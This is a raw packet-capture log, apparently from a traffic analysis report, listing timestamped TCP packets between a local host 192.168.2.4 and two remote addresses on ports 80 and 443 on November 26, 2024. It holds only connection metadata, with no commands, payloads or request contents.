                                                                            Nov 26, 2024 09:44:18.278021097 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.278053045 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.282550097 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.282625914 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.282639980 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.282680035 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.286216021 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.286263943 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.286294937 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.286341906 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.289520025 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.289582968 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.289608955 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.289649963 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.292037010 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.292088985 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.292191029 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.292229891 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.295372009 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.295428038 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:22.454545021 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:22.454608917 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:23.783675909 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:23.783723116 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:23.783799887 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:23.794720888 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:23.794739008 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:25.628618956 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:25.628725052 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:25.631527901 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:25.631536961 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:25.631848097 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:25.648168087 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:25.691332102 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.058329105 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.058350086 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.058476925 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.058515072 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.075103045 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.075182915 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.075222015 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.120935917 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.259253979 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.259267092 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.259344101 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.259365082 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.286334038 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.286344051 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.286416054 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.286432981 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.309808969 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.309818029 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.309881926 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.309892893 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.340444088 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.340452909 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.340496063 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.340501070 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.340533018 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.340545893 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.379195929 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.379205942 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.379245996 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.379290104 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.379302025 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.379348040 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.479156971 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.479167938 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.479218960 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.483505964 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.502106905 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.502116919 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.502145052 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.502171993 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.502211094 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.520344973 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.520359039 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.520437002 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.520452976 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.531760931 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.531770945 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.531838894 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.531846046 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.541707993 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.541716099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.541784048 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.541790962 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.552066088 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.552076101 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.552134991 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.552144051 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.560765028 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.560771942 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.560834885 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.560842991 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.605282068 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.653884888 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:26.661313057 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.661329985 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.661348104 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.661429882 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.671113968 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.671124935 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.671164036 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.671196938 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.671257019 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.679439068 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.679446936 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.679522991 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.679538012 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.690942049 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.690952063 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.691021919 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.691030979 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.699825048 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.699835062 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.700078011 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.700084925 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.708570004 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.708581924 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.708803892 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.708823919 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.714925051 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.714935064 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.715269089 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.715289116 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.719852924 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.719862938 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.720536947 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.720551014 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.725074053 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.725086927 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.726749897 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.726768970 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.731514931 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.731571913 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.731601954 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.731616974 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.731642008 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.737195969 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.737246990 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.737312078 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.737312078 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.737328053 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.742088079 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.742214918 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.742232084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.747127056 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.747246027 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.747262001 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.753689051 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.753783941 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.753791094 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.808603048 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.864970922 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.864989042 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.865010977 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.865102053 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.865102053 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.869893074 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.869901896 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.870038033 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.870068073 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.874872923 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.874882936 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.875000000 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.875020027 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.881395102 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.881448030 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.881475925 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.881491899 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.881556034 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.886482000 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.886491060 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.886733055 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.886749029 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.887023926 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.891412973 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.891798019 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.891812086 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.897911072 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.897990942 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.898005009 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.903017998 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.903136969 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.903155088 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.907771111 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.908169985 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.908190966 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.913080931 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.913249016 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.913269997 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.919282913 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.919404984 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.919424057 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.923662901 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.923755884 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.923774958 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.928297997 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.928510904 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.928534031 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.934288025 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.934395075 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.934416056 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.939173937 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.939279079 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.939325094 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.943440914 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.943567038 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:26.943574905 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:26.996054888 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.066251040 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.066271067 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.066299915 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.066405058 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.066405058 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.071060896 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.071075916 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.071167946 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.071194887 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.074886084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.074923038 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.075020075 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.075021029 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.075042009 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.079830885 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.080533981 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.080542088 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.083463907 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.083878040 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.083884001 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.087330103 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.088537931 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.088546038 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.092103004 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.092192888 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.092201948 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.095894098 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.096013069 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.096021891 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.099654913 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.099863052 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.099874020 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.104857922 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.105007887 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.105036020 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.109349012 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.109469891 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.109477997 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.112607002 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.112816095 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.112823963 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.116631985 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.116770983 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.116791010 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.123733997 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.124053001 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.124073982 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.126447916 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.126842022 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.126849890 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.129645109 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.129765987 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.129772902 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.184545040 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.269015074 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.269033909 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.269073963 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.269114971 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.269279003 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.272105932 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.272119999 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.272192955 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.272206068 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.275729895 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.275768042 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.275849104 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.275849104 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.275859118 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.280450106 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.280538082 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.280570030 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.284245014 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.284359932 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.284382105 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.287790060 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.287971973 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.287992001 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.292503119 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.292601109 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.292622089 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.296241045 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.296307087 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.296322107 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.300854921 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.300930023 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.300951004 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.304539919 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.304656029 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.304668903 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.308763981 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.308919907 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.308928013 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.312434912 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.312536001 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.312542915 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.316066027 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.316184044 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.316201925 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.320720911 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.320811987 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.320833921 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.324430943 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.324506044 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.324532986 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.329183102 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.329418898 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.329443932 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.371145010 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.470288992 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.470304012 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.470413923 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.470444918 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.473773956 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.473783016 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.478452921 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.478467941 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.482012033 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.483658075 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.483669996 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.483887911 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 26, 2024 09:44:27.486180067 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 26, 2024 09:44:27.486268044 CET49731443192.168.2.4193.30.119.205
